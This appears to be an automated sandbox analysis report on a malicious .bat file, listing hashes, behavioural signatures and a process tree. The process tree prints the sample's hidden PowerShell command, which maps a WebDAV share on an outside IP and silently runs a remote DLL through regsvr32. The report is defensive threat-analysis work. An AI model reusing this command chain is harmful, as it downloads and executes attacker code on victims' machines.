Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
20-07-2024 05:35
Static task
static1
Behavioral task
behavioral1
Sample
27810222482427612616.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
27810222482427612616.bat
Resource
win10v2004-20240709-en
General
-
Target
27810222482427612616.bat
-
Size
17KB
-
MD5
f950f3e97d8fbde8ccf55f5e58552acc
-
SHA1
95e2a9202403339f5abd407d82bd7380ff39b128
-
SHA256
32abcf421523d8cb99016a11655de65f76a8c7ca074e51a83e549127b73a5f4d
-
SHA512
f99cb779a289295bdbcc8c1daab6c3690f3bf7186593a95468746b5583890538bb0d97510e109eaec324dad6099da1aeedc9bc128856a531c155478541d1c5af
-
SSDEEP
192:ei1fVOTcxXUMK70h0nQq14O3voiLHYTHFaOY84ppeyYw2q9RX2nGt88o88dAXcAT:ei7xXUMK7Z1NvfHYhR4PYV0c/teijwp
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2416 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2416 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2416 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe 2828 wordpad.exe -
Suspicious use of WriteProcessMemory 14 IoCs
description pid Process procid_target PID 2092 wrote to memory of 2828 2092 cmd.exe 31 PID 2092 wrote to memory of 2828 2092 cmd.exe 31 PID 2092 wrote to memory of 2828 2092 cmd.exe 31 PID 2092 wrote to memory of 2416 2092 cmd.exe 32 PID 2092 wrote to memory of 2416 2092 cmd.exe 32 PID 2092 wrote to memory of 2416 2092 cmd.exe 32 PID 2416 wrote to memory of 2552 2416 powershell.exe 34 PID 2416 wrote to memory of 2552 2416 powershell.exe 34 PID 2416 wrote to memory of 2552 2416 powershell.exe 34 PID 2416 wrote to memory of 2572 2416 powershell.exe 35 PID 2416 wrote to memory of 2572 2416 powershell.exe 35 PID 2416 wrote to memory of 2572 2416 powershell.exe 35 PID 2416 wrote to memory of 2572 2416 powershell.exe 35 PID 2416 wrote to memory of 2572 2416 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\27810222482427612616.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\20771511422321.dll2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.36@8888\davwwwroot\3⤵PID:2552
-
-
C:\Windows\system32\regsvr32.exe"C:\Windows\system32\regsvr32.exe" /s \\45.9.74.36@8888\davwwwroot\20771511422321.dll3⤵PID:2572
-
-